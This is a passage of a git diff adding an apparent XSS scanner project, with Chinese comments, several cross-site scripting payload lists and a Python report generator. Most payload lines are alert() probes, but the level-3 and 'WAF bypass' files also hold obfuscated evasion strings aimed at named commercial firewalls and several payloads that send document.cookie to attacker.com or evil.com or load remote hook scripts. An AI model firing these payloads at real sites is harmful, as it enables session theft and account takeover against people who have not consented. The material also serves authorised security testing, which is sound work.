@@ -0,0 +1,15 @@
+<script>alert('XSS')</script>
+<img src=x onerror=alert('XSS')>
+<svg onload=alert('XSS')>
+<body onload=alert('XSS')>
+<iframe onload=alert('XSS')></iframe>
+javascript:alert('XSS')
+<input autofocus onfocus=alert('XSS')>
+<select autofocus onfocus=alert('XSS')>
+<textarea autofocus onfocus=alert('XSS')>
+<keygen autofocus onfocus=alert('XSS')>
+<video><source onerror=alert('XSS')>
+<audio src=x onerror=alert('XSS')>
+"><script>alert('XSS')</script>
+'><script>alert('XSS')</script>
+><img src=x onerror=alert('XSS')> 
\ No newline at end of file
diff --git a/xss_scanner/payloads/xss/xss_level2.txt b/xss_scanner/payloads/xss/xss_level2.txt
new file mode 100644
index 0000000..fbd5db4
--- /dev/null
+++ b/xss_scanner/payloads/xss/xss_level2.txt
@@ -0,0 +1,29 @@
+# 基本混淆和绕过技术
+<script>eval(atob('YWxlcnQoJ1hTUycpOw=='))</script>
+<IMG SRC="javascript:alert('XSS');">
+<svg><script>alert&#40;1&#41</script>
+<body onpageshow=alert(1)>
+<body onload=alert('XSS')>
+<input type="text" value="" onfocus="alert('XSS')" autofocus>
+<video><source onerror="javascript:alert('XSS')">
+<iFrAme SRC="javascript:alert('XSS');"></iFramE>
+<div onmouseover="alert('XSS')">XSS</div>
+<marquee onstart='alert("XSS")'>XSS</marquee>
+<img src="/" onerror="alert(String.fromCharCode(88,83,83))"/>
+<svg onload="javascript:alert('XSS')" xmlns="http://www.w3.org/2000/svg"></svg>
+<style>@import 'data:text/css;base64,KiAge2JhY2tncm91bmQtaW1hZ2U6IHVybCgiamF2YXNjcmlwdDphbGVydCgiWFNTIikiKX0=')</style>
+<math><a xlink:href="javascript:alert(1)">click</a></math>
+<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
+<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
+<base href="javascript:alert('XSS')//">
+<script src="data:text/javascript,alert(1)"></script>
+<iframe src="javascript:alert('XSS');"></iframe>
+<form action="javascript:alert('XSS')"><input type="submit"></form>
+<isindex action="javascript:alert('XSS')" type=image>
+<input type="image" src="javascript:alert('XSS');">
+<table background="javascript:alert('XSS')">
+<button form="test" formaction="javascript:alert(1)">XSS</button>
+<meta http-equiv="refresh" content="0;url=javascript:alert('XSS');">
+<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>XSS</a>
+<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+$.$$_+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.__$+$.__$+$._+"(\\\"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\\")"+$.$$$_)())();</script>
+<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">XSS</a> 
\ No newline at end of file
diff --git a/xss_scanner/payloads/xss/xss_level3.txt b/xss_scanner/payloads/xss/xss_level3.txt
new file mode 100644
index 0000000..26aa120
--- /dev/null
+++ b/xss_scanner/payloads/xss/xss_level3.txt
@@ -0,0 +1,50 @@
+# 高级XSS有效载荷与绕过技术
+<script>Function("ale"+"rt(1)")();</script>
+<script>['ale'+'rt'](1)</script>
+<script>window['alert'](0)</script>
+<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
+<svg onload=prompt(1);>
+<script>new Function`alt\`1\``</script>
+<script>(()=>{return this})().alert(1)</script>
+<script>var{a:onerror}={a:eval};throw 'alert\x281\x29'</script>
+<img/id="'`-->" src=x onerror=javascript:alert(2)>
+<img src=x onerror=eval('\141\154\145\162\164\50\61\51')>
+<body/onhashchange=alert(1)><a href=#>click
+<iframe src=javascript:alert(1)//
+<script ~~~>confirm(1)</script ~~~>
+<script>$=Function,$($()\`alert\\\`1\\\`\`)();</script>
+<script>onerror=eval;throw'=alert\x281\x29';</script>
+<script>delete[a],alert(1)</script>
+<svg><discard onbegin=alert(1)>
+<math href="javascript:alert(1)">CLICKME</math>
+<img src=x:alert(alt) onerror=eval(src) alt=xss>
+<a href="j&Tab;a&Tab;v&Tab;asc&Tab;r&Tab;ipt&colon;confirm&lpar;1&rpar;">Click</a>
+<dETAILS open onToGgle=a=alert,a(1)>
+<iframe src="javascript:void(top[Object.keys(top)[2]](Object.keys(top)[5]))" width="500" height="500"></iframe>
+<embed code="//x.test/xss.swf" allowscriptaccess=always></embed>
+<svg><set onbegin=d=document;d.evaluate('\u0061lert(1)',d,null,6,null).iterateNext() >
+<iframe/onload=action=URL;Array(1).keys(a=function(...args)args[0].dispatchEvent(new+Event('focus'))).next(a(body.querySelector('input[autofocus]'))>
+<math><mtext><option><FAKEELEMENT><math><option><annotation-xml encoding="text/html"><iframe onload=alert(1)></iframe></annotation-xml></math></option></option></mtext></math>
+<style>:target {color:red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=alert(1)></xss>
+<svg><animate onrepeat=alert(1) attributeName=x dur=1m></animate>
+<details/open=/id=x tabindex=1 onfocus=alert(1) id=x>
+<img src onerror=\u0065\u0076\u0061\u006c\u0028\u0061\u0074\u006f\u0062\u0028\u0027\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u0059\u0053\u0063\u0072\u0056\u006c\u004e\u0054\u004a\u0027\u0029\u0029>
+<iframe/src="data:text/html,<svg onload=confirm(1)>"><script>~'</script><!--<script>eval('var a=String.fromCharCode(47);var b=String.fromCharCode(42);var c=String.fromCharCode(42);var d=String.fromCharCode(47);eval(\'docu\'+\'ment.bod\'+\'y.inne\'+\'rHTML="Hac\'+\'ked"\');')</script>
+<object data="data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e"></object>
+<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
+<textarea id=ta onfocus=console.log(event)></textarea><div contenteditable onbeforeinput="ta.dispatchEvent(new InputEvent('input', {inputType: 'insertFromPaste', data: 'alert(1)', dataTransfer: new DataTransfer()}))"
+<div style="filter:url('data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>');">
+<iframe srcdoc="<script>top[8680439..toString(30)](1)</script>">
+<P%=tE%xt><svg/o%=nload=confirm(9)><ClIcK me</SvG>
+<svg><animate onbegin%3D=alert%26%23x28;)></animate>
+<input type="search" onsearch="alert()()()()" />
+<meta charset="x-mac-farsi">\u03C3cript\u03BE alert('xss');</script>
+<scr\0ipt>confirm(1)</scr\0ipt>
+<a onmouseover="document['cookie']=['Cookie Monster!']; alert(document['cookie'])">XSS</a>
+<img/src='data:image/svg+xml,<svg onload=alert(1)>' />
+<input onfocus="alert(document.domain);" autofocus>
+<script>throw{set:document.location='//attacker.com',name:'cookie',message:document.cookie}</script>
+<input autofocus="autofocus"onkeyup="this.focus();var a=this.style.box-shadow; a = document.domain; alert(a);" value="I contain info">
+<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11; id="fuzzelement1">test</a>
+<div style="background:url(http://foo.f/f ='`'><script>alert(1)</script>"><script>alert(1)</script>
+<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"></import> <t:set attributeName="innerHTML" targetElement="x" to="<img src=x onerror=alert(1)>"></t:set> 
\ No newline at end of file
diff --git a/xss_scanner/payloads/xss/xss_waf_bypass.txt b/xss_scanner/payloads/xss/xss_waf_bypass.txt
new file mode 100644
index 0000000..c2c1043
--- /dev/null
+++ b/xss_scanner/payloads/xss/xss_waf_bypass.txt
@@ -0,0 +1,69 @@
+# Cloudflare绕过
+<ScrIpT>prompt(1)</sCrIpT>
+<a/onmouseover=prompt(1)>XSS
+<a/href="j&#97v&#97script&#x3A;&#97lert(1)">XSS
+<svg/onload=confirm(String.fromCharCode(88,83,83))>
+<img/src="x"/onerror=document['cookie'];eval(atob('YWxlcnQoImNvb2tpZSBzdGVhbGVyIik7'));>
+<body/onwheel="[1].find(alert)">Roll ME
+<svg onload=setInterval`alert\u0028document.domain\u0029`>
+<x/onclick=document.location='http://xss.rocks/xss.js'>click me
+
+# ModSecurity绕过
+<details/open/ontoggle="alert`1`">XSS
+<a69/onclick=[1].map(alert)>XSS
+<IfRaMe/src=javascript:alert(1)>
+<l/onclick="[''].findIndex(alert)">l
+<%78%63%72%69%70%74>a=prompt;a(1);</%78%63%72%69%70%74>
+<img src=1 onerror="a=alert;a(1)">
+<img src=1 o&#x6e;error="javascript&colon;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;1&#x29;">
+
+# Imperva绕过
+<iframe/onload='this["src"]="javas&Tab;cript:document["locati&Tab;on"]["replace"]("https://evil.com/"+document["cookie"]);'>
+<img src=x:prompt(eval(atob('ZG9jdW1lbnQuY29va2ll')))>
+<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
+<scrIPT x=">" SRC="https://attacker.com/xss.js"></scrIPT>
+<d3"<"/onclick="1>[confirm``]"<">d3
+
+# F5 BIG-IP绕过
+<noscript><p title="</noscript><img src=x onerror=alert(1)>">
+<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>XSS
+<input type="text" value="> " onkeydown="prompt(1)" autofocus ">
+<form><button formaction=javascript&colon;alert(1)>XSS
+<img/src='x'%0Aonerror=confirm`1`>
+
+# Akamai绕过
+<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">XSS</a>
+<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
+<img src=``&NewLine; onerror=alert(1)&NewLine;``>
+<script>~'<script>'/**/;alert(1)//'</script>
+<style><script>a@import'//XSS.rocks'</script></style>
+
+# 通用WAF绕过
+<svg><animate onbegin=confirm() attributeName=x></svg>
+<script>$=1,$$='ale',$$$='rt',$$$$=`(1)`,eval($$+$$$+$$$$)</script>
+<details ontoggle=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>
+<img src=x onerror=\u0065\u0076\u0061\u006c('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029')>
+<body onpageshow=top['ale'+'rt']('1')>
+<body onpageshow=function(){eval(String.fromCodePoint(97,108,101,114,116,40,49,41))}>
+<math><xss href="javascript:alert(1)">XSS
+<a href="j&X41vascript&colon;alert&lpar;1&rpar;">XSS
+<button autofocus onfocus=top[11000000..toString(36)[0]+628..toString(36)[1]+'ert'](1)></button>
+<img/src="x"/onerror=top['\141\154\145\162\164'](1)>
+<svg><script>+(x=>document[`body`].appendChild(document[`createElement`](`img`)).src=`https://attacker.com/c/`+document[`cookie`])()</script>
+<a href=javascript:alert(1)>XSS
+<img src="x" onerror="window&#46;document&#46;location = '//attacker.com/' + document&#46;cookie;">
+<iframe srcdoc="<a href='javascript:alert(1)'>XSS</a>"></iframe>
+
+# 混淆和编码组合
+<img src=x onerror="Function(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()">
+<body><template><s id=x onclick=alert()>XSS</s></template></body>
+<img src=x onerror=eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029')>
+<A HREF="h&#x74t&#x70&#x3a&#x2f&#x2f&#x67o&#x6f&#x67&#x6c&#x65&#x2e&#x63&#x6f&#x6d">XSS</A>
+<body><textarea onkeyup='javascript:"\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"'></textarea>
+<img%09onerror=alert(1) src=a>
+<i onclick=c&#39;onfirm(1)>click me</i>
+<div id="x">x</div><script>Object.prototype.BUMMER=1;document.getElementById('x').innerHTML='XSS'</script>
+<iframe src="javascript:(function(){var s=document.createElement('script');s.src='//attacker.com/hook.js';document.body.appendChild(s)})()"></iframe>
+<input autofocus onfocus="document.body.appendChild(document.createElement`img`).src='https://attacker.com/c/'+document.cookie">
+<math><mtext><option><FAKEELEMENT><math><option><annotation-xml encoding="text/html"><img src=x onerror=alert(1)><annotation-xml>
+<div id="div1"><input value="``onmouseover=alert(1)"></div><div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> 
\ No newline at end of file
diff --git a/xss_scanner/reporters/__init__.py b/xss_scanner/reporters/__init__.py
new file mode 100644
index 0000000..1915fcf
--- /dev/null
+++ b/xss_scanner/reporters/__init__.py
@@ -0,0 +1 @@
+"""XSS扫描器 - 报告生成模块""" 
\ No newline at end of file
diff --git a/xss_scanner/reporters/__pycache__/__init__.cpython-313.pyc b/xss_scanner/reporters/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..c7a1748
Binary files /dev/null and b/xss_scanner/reporters/__pycache__/__init__.cpython-313.pyc differ
diff --git a/xss_scanner/reporters/__pycache__/report_generator.cpython-313.pyc b/xss_scanner/reporters/__pycache__/report_generator.cpython-313.pyc
new file mode 100644
index 0000000..8e5d763
Binary files /dev/null and b/xss_scanner/reporters/__pycache__/report_generator.cpython-313.pyc differ
diff --git a/xss_scanner/reporters/report_generator.py b/xss_scanner/reporters/report_generator.py
new file mode 100644
index 0000000..8be7635
--- /dev/null
+++ b/xss_scanner/reporters/report_generator.py
@@ -0,0 +1,581 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+报告生成器模块，负责生成扫描结果报告
+"""
+
+import os
+import json
+import logging
+import html
+import datetime
+from xml.dom.minidom import getDOMImplementation
+
+logger = logging.getLogger('xss_scanner')
+
+def format_details_for_txt(details):
+    """
+    格式化漏洞详情为文本格式
+    
+    Args:
+        details: 漏洞详情，可能是字符串或字典
+        
+    Returns:
+        str: 格式化后的漏洞详情文本
+    """
+    if isinstance(details, dict):
+        return '\n  '.join([f"{k}: {v}" for k, v in details.items()])
+    return str(details)
+
+def format_details_for_html(details):
+    """
+    格式化漏洞详情为HTML格式
+    
+    Args:
+        details: 漏洞详情，可能是字符串或字典
+        
+    Returns:
+        str: 格式化后的HTML内容
+    """
+    if isinstance(details, dict):
+        return ''.join([f"<strong>{html.escape(str(k))}:</strong> {html.escape(str(v))}" for k, v in details.items()])
+    return html.escape(str(details))
+
+def generate_report(results, output_file, format_type='html'):
+    """
+    生成扫描报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+        format_type: 报告格式 (html, json, xml, txt)
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    # 创建输出目录（如果不存在）
+    output_dir = os.path.dirname(output_file)
+    if output_dir and not os.path.exists(output_dir):
+        os.makedirs(output_dir)
+    
+    try:
+        if format_type == 'html':
+            return generate_html_report(results, output_file)
+        elif format_type == 'json':
+            return generate_json_report(results, output_file)
+        elif format_type == 'xml':
+            return generate_xml_report(results, output_file)
+        elif format_type == 'txt':
+            return generate_txt_report(results, output_file)
+        else:
+            logger.error(f"不支持的报告格式: {format_type}")
+            return False
+    except Exception as e:
+        logger.error(f"生成报告时发生错误: {str(e)}")
+        return False
+
+def generate_html_report(results, output_file):
+    """
+    生成HTML格式的报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    # 合并所有结果的统计信息
+    total_stats = {
+        'pages_scanned': 0,
+        'forms_tested': 0,
+        'parameters_tested': 0,
+        'vulnerabilities_found': 0
+    }
+    
+    all_vulnerabilities = []
+    targets = []
+    start_time = None
+    total_time = 0
+    
+    for result in results:
+        targets.append(result['target'])
+        
+        # 更新统计信息
+        for key in total_stats:
+            if key in result['statistics']:
+                total_stats[key] += result['statistics'][key]
+        
+        # 收集所有漏洞
+        all_vulnerabilities.extend(result['vulnerabilities'])
+        
+        # 计算总扫描时间
+        if result.get('start_time') and result.get('end_time'):
+            total_time += (result['end_time'] - result['start_time'])
+        
+        # 记录最早的开始时间
+        if start_time is None or (result.get('start_time') and result['start_time'] < start_time):
+            start_time = result.get('start_time')
+    
+    # 按漏洞类型分组
+    vuln_by_type = {}
+    for vuln in all_vulnerabilities:
+        vuln_type = vuln['type']
+        if vuln_type not in vuln_by_type:
+            vuln_by_type[vuln_type] = []
+        vuln_by_type[vuln_type].append(vuln)
+    
+    # 生成HTML报告
+    html_content = f"""<!DOCTYPE html>
+<html lang="zh-CN">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>XSS深度漏洞扫描报告</title>
+    <style>
+        body {{
+            font-family: "Segoe UI", Arial, sans-serif;
+            line-height: 1.6;
+            color: #333;
+            max-width: 1200px;
+            margin: 0 auto;
+            padding: 20px;
+            background-color: #f9f9f9;
+        }}
+        .container {{
+            background-color: #fff;
+            border-radius: 8px;
+            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
+            padding: 20px;
+            margin-bottom: 30px;
+        }}
+        h1, h2, h3, h4 {{
+            color: #2c3e50;
+            margin-top: 20px;
+        }}
+        h1 {{
+            text-align: center;
+            color: #3498db;
+            border-bottom: 2px solid #3498db;
+            padding-bottom: 10px;
+            margin-bottom: 30px;
+        }}
+        .header-info {{
+            display: flex;
+            justify-content: space-between;
+            flex-wrap: wrap;
+        }}
+        .header-info div {{
+            flex: 1;
+            min-width: 250px;
+            margin: 10px;
+        }}
+        table {{
+            width: 100%;
+            border-collapse: collapse;
+            margin: 20px 0;
+        }}
+        th, td {{
+            border: 1px solid #ddd;
+            padding: 12px;
+            text-align: left;
+        }}
+        th {{
+            background-color: #f2f2f2;
+            font-weight: bold;
+        }}
+        tr:nth-child(even) {{
+            background-color: #f9f9f9;
+        }}
+        .severity-high {{
+            color: #e74c3c;
+            font-weight: bold;
+        }}
+        .severity-medium {{
+            color: #f39c12;
+            font-weight: bold;
+        }}
+        .severity-low {{
+            color: #3498db;
+            font-weight: bold;
+        }}
+        .stats-container {{
+            display: flex;
+            flex-wrap: wrap;
+            justify-content: space-between;
+            margin-bottom: 20px;
+        }}
+        .stat-box {{
+            flex: 1;
+            min-width: 200px;
+            background-color: #fff;
+            border-radius: 8px;
+            box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
+            padding: 15px;
+            margin: 10px;
+            text-align: center;
+        }}
+        .stat-value {{
+            font-size: 24px;
+            font-weight: bold;
+            color: #3498db;
+            margin: 10px 0;
+        }}
+        .stat-label {{
+            font-size: 14px;
+            color: #7f8c8d;
+        }}
+        .vuln-details {{
+            background-color: #f8f9fa;
+            border-left: 4px solid #3498db;
+            padding: 12px;
+            margin: 10px 0;
+            border-radius: 0 4px 4px 0;
+        }}
+        .no-vulns {{
+            text-align: center;
+            color: #27ae60;
+            font-size: 18px;
+            padding: 20px;
+            background-color: #e8f8f5;
+            border-radius: 5px;
+            margin: 20px 0;
+        }}
+        .footer {{
+            text-align: center;
+            margin-top: 30px;
+            padding-top: 20px;
+            border-top: 1px solid #eee;
+            color: #7f8c8d;
+        }}
+    </style>
+</head>
+<body>
+    <div class="container">
+        <h1>XSS深度漏洞扫描报告</h1>
+        
+        <div class="header-info">
+            <div>
+                <h3>扫描信息</h3>
+                <strong>目标网站：</strong> {', '.join(targets)}
+                <strong>扫描时间：</strong> {datetime.datetime.fromtimestamp(start_time).strftime('%Y-%m-%d %H:%M:%S') if start_time else 'N/A'}
+                <strong>总耗时：</strong> {total_time:.2f}秒
+            </div>
+            <div>
+                <h3>扫描范围</h3>
+                <strong>扫描页面：</strong> {total_stats['pages_scanned']}
+                <strong>测试表单：</strong> {total_stats['forms_tested']}
+                <strong>测试参数：</strong> {total_stats['parameters_tested']}
+            </div>
+        </div>
+        
+        <div class="stats-container">
+            <div class="stat-box">
+                <div class="stat-label">发现漏洞</div>
+                <div class="stat-value">{total_stats['vulnerabilities_found']}</div>
+            </div>
+            <div class="stat-box">
+                <div class="stat-label">页面扫描</div>
+                <div class="stat-value">{total_stats['pages_scanned']}</div>
+            </div>
+            <div class="stat-box">
+                <div class="stat-label">表单测试</div>
+                <div class="stat-value">{total_stats['forms_tested']}</div>
+            </div>
+            <div class="stat-box">
+                <div class="stat-label">参数测试</div>
+                <div class="stat-value">{total_stats['parameters_tested']}</div>
+            </div>
+        </div>
+    </div>
+
+    <div class="container">
+        <h2>漏洞详情</h2>
+"""
+    
+    if all_vulnerabilities:
+        for vuln_type, vulns in vuln_by_type.items():
+            html_content += f"""
+        <h3>{vuln_type} 漏洞 ({len(vulns)})</h3>
+        <table>
+            <tr>
+                <th>#</th>
+                <th>URL</th>
+                <th>参数</th>
+                <th>漏洞级别</th>
+                <th>描述</th>
+            </tr>
+"""
+            
+            for i, vuln in enumerate(vulns, 1):
+                severity_class = ""
+                if vuln.get('severity') == '高':
+                    severity_class = "severity-high"
+                elif vuln.get('severity') == '中':
+                    severity_class = "severity-medium"
+                else:
+                    severity_class = "severity-low"
+                    
+                html_content += f"""
+            <tr>
+                <td>{i}</td>
+                <td>{html.escape(vuln.get('url', ''))}</td>
+                <td>{html.escape(vuln.get('parameter', ''))}</td>
+                <td class="{severity_class}">{html.escape(vuln.get('severity', ''))}</td>
+                <td>{html.escape(vuln.get('description', ''))}</td>
+            </tr>
+            <tr>
+                <td colspan="5">
+                    <div class="vuln-details">
+                        <strong>详情：</strong> {format_details_for_html(vuln.get('details', ''))}
+                        <strong>Payload：</strong> {html.escape(str(vuln.get('payload', '')))}
+                        <strong>修复建议：</strong> {html.escape(str(vuln.get('recommendation', '')))}
+                    </div>
+                </td>
+            </tr>
+"""
+            
+            html_content += """
+        </table>
+"""
+    else:
+        html_content += """
+        <div class="no-vulns">
+            恭喜！未发现任何漏洞。
+        </div>
+"""
+    
+    html_content += """
+    </div>
+    
+    <div class="footer">
+        扫描报告生成时间：""" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + """
+        XSS深度漏洞扫描器 v1.0.0
+    </div>
+</body>
+</html>
+"""
+    
+    # 写入文件
+    with open(output_file, 'w', encoding='utf-8') as f:
+        f.write(html_content)
+    
+    return True
+
+def generate_json_report(results, output_file):
+    """
+    生成JSON格式的报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    # 添加报告生成时间
+    report = {
+        'report_time': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
+        'results': results
+    }
+    
+    # 写入文件
+    with open(output_file, 'w', encoding='utf-8') as f:
+        json.dump(report, f, indent=2, ensure_ascii=False)
+    
+    return True
+
+def generate_xml_report(results, output_file):
+    """
+    生成XML格式的报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    impl = getDOMImplementation()
+    
+    # 创建文档和根元素
+    doc = impl.createDocument(None, "xss_scanner_report", None)
+    root = doc.documentElement
+    
+    # 添加报告生成时间
+    report_time = doc.createElement("report_time")
+    report_time.appendChild(doc.createTextNode(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
+    root.appendChild(report_time)
+    
+    # 添加结果
+    results_elem = doc.createElement("results")
+    root.appendChild(results_elem)
+    
+    for result in results:
+        result_elem = doc.createElement("result")
+        results_elem.appendChild(result_elem)
+        
+        # 添加目标
+        target_elem = doc.createElement("target")
+        target_elem.appendChild(doc.createTextNode(result.get('target', '')))
+        result_elem.appendChild(target_elem)
+        
+        # 添加扫描信息
+        if 'scan_info' in result:
+            scan_info_elem = doc.createElement("scan_info")
+            result_elem.appendChild(scan_info_elem)
+            
+            for key, value in result['scan_info'].items():
+                elem = doc.createElement(key)
+                elem.appendChild(doc.createTextNode(str(value)))
+                scan_info_elem.appendChild(elem)
+        
+        # 添加统计信息
+        if 'statistics' in result:
+            stats_elem = doc.createElement("statistics")
+            result_elem.appendChild(stats_elem)
+            
+            for key, value in result['statistics'].items():
+                elem = doc.createElement(key)
+                elem.appendChild(doc.createTextNode(str(value)))
+                stats_elem.appendChild(elem)
+        
+        # 添加漏洞
+        if 'vulnerabilities' in result:
+            vulns_elem = doc.createElement("vulnerabilities")
+            result_elem.appendChild(vulns_elem)
+            
+            for vuln in result['vulnerabilities']:
+                vuln_elem = doc.createElement("vulnerability")
+                vulns_elem.appendChild(vuln_elem)
+                
+                for key, value in vuln.items():
+                    elem = doc.createElement(key)
+                    if isinstance(value, dict):
+                        # 处理嵌套字典
+                        for sub_key, sub_value in value.items():
+                            sub_elem = doc.createElement(sub_key)
+                            sub_elem.appendChild(doc.createTextNode(str(sub_value)))
+                            elem.appendChild(sub_elem)
+                    else:
+                        elem.appendChild(doc.createTextNode(str(value)))
+                    vuln_elem.appendChild(elem)
+    
+    # 写入文件
+    with open(output_file, 'w', encoding='utf-8') as f:
+        f.write(doc.toprettyxml(indent="  "))
+    
+    return True
+
+def generate_txt_report(results, output_file):
+    """
+    生成TXT格式的报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    # 合并所有结果的统计信息
+    total_stats = {
+        'pages_scanned': 0,
+        'forms_tested': 0,
+        'parameters_tested': 0,
+        'vulnerabilities_found': 0
+    }
+    
+    all_vulnerabilities = []
+    targets = []
+    start_time = None
+    total_time = 0
+    
+    for result in results:
+        targets.append(result['target'])
+        
+        # 更新统计信息
+        for key in total_stats:
+            if key in result['statistics']:
+                total_stats[key] += result['statistics'][key]
+        
+        # 收集所有漏洞
+        all_vulnerabilities.extend(result['vulnerabilities'])
+        
+        # 计算总扫描时间
+        if result.get('start_time') and result.get('end_time'):
+            total_time += (result['end_time'] - result['start_time'])
+        
+        # 记录最早的开始时间
+        if start_time is None or (result.get('start_time') and result['start_time'] < start_time):
+            start_time = result.get('start_time')
+    
+    # 按漏洞类型分组
+    vuln_by_type = {}
+    for vuln in all_vulnerabilities:
+        vuln_type = vuln['type']
+        if vuln_type not in vuln_by_type:
+            vuln_by_type[vuln_type] = []
+        vuln_by_type[vuln_type].append(vuln)
+    
+    # 生成TXT报告
+    txt_content = f"""
+==========================================
+       XSS深度漏洞扫描报告
+==========================================
+
+扫描信息
+------------------------------------------
+目标网站：{', '.join(targets)}
+扫描时间：{datetime.datetime.fromtimestamp(start_time).strftime('%Y-%m-%d %H:%M:%S') if start_time else 'N/A'}
+总耗时：{total_time:.2f}秒
+
+扫描统计
+------------------------------------------
+发现漏洞：{total_stats['vulnerabilities_found']}
+扫描页面：{total_stats['pages_scanned']}
+测试表单：{total_stats['forms_tested']}
+测试参数：{total_stats['parameters_tested']}
+
+漏洞详情
+==========================================
+"""
+    
+    if all_vulnerabilities:
+        for vuln_type, vulns in vuln_by_type.items():
+            txt_content += f"""
+{vuln_type} 漏洞 ({len(vulns)})
+------------------------------------------
+"""
+            
+            for i, vuln in enumerate(vulns, 1):
+                txt_content += f"""
+#{i}
+URL: {vuln.get('url', '')}
+参数: {vuln.get('parameter', '')}
+漏洞级别: {vuln.get('severity', '')}
+描述: {vuln.get('description', '')}
+详情: {format_details_for_txt(vuln.get('details', ''))}
+Payload: {vuln.get('payload', '')}
+修复建议: {vuln.get('recommendation', '')}
+
+"""
+    else:
+        txt_content += """
+恭喜！未发现任何漏洞。
+
+"""
+    
+    txt_content += f"""
+==========================================
+报告生成时间：{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
+XSS深度漏洞扫描器 v1.0.0
+==========================================
+"""
+    
+    # 写入文件
+    with open(output_file, 'w', encoding='utf-8') as f:
+        f.write(txt_content)
+    
+    return True 
\ No newline at end of file
diff --git a/xss_scanner/scanners/__init__.py b/xss_scanner/scanners/__init__.py
new file mode 100644
index 0000000..483c699
--- /dev/null
+++ b/xss_scanner/scanners/__init__.py
@@ -0,0 +1 @@
+"""XSS扫描器 - 扫描器模块包""" 
\ No newline at end of file
diff --git a/xss_scanner/scanners/__pycache__/__init__.cpython-313.pyc b/xss_scanner/scanners/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..1216055
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/__init__.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/__pycache__/csrf_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/csrf_scanner.cpython-313.pyc
new file mode 100644
index 0000000..fc162e5
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/csrf_scanner.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/__pycache__/lfi_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/lfi_scanner.cpython-313.pyc
new file mode 100644
index 0000000..e3e7167
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/lfi_scanner.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/__pycache__/rfi_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/rfi_scanner.cpython-313.pyc
new file mode 100644
index 0000000..f3f1d96
